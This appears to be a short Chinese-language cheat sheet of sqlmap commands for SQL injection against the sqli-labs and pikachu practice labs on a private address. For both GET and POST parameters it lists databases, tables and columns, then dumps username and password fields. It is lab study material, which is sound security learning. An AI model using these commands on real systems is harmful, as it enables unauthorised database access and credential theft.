get:
1.获取数据库基本信息查询有哪些数据库
sqlmap -u "http://192.168.128.1/sqli-labs-master/Less-1/index.php?id=1" -dbs
2.查询security数据库中有哪些表
sqlmap -u "http://192.168.128.1/sqli-labs-master/Less-1/index.php?id=1" -level 5 -dbs -D security -tables
3.查询security数据库中users表的字段
sqlmap -u "http://192.168.128.1/sqli-labs-master/Less-1/index.php?id=1" -dbms mysql -level 3 -dbs -D security -T users -columns
4.dump出字段username与password中的数据
- –dump 转储数据库管理系统的数据库中的表项
sqlmap -u "http://192.168.128.1/sqli-labs-master/Less-1/index.php?id=1" -dbms mysql -level 3 -dbs -D security -T users -C "username,password" -dump
post:
1.查询数据库信息
sqlmap -u "http://192.168.128.1/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" --dbs -batch
2.获取pikachu数据库下的表
sqlmap -u "http://192.168.128.1/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" --dbs -D pikachu -tables -batch
3.获取users表下的字段
sqlmap -u "http://192.168.128.1/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" --dbs -D pikachu -T users -columns -batch
4.获取username,password的值
sqlmap -u "http://192.168.128.1/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users -C username,password --dump --batch